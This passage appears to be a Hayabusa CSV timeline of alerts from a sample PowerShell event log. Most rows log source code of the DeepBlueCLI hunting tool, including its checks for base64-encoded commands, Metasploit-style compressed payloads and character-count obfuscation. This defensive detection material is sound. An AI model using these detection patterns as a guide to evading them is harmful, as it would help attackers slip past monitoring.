""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if 
command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.024 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.029 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:05.032 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.017 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.046 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.048 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:18.049 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:43:19.155 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.122 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are 
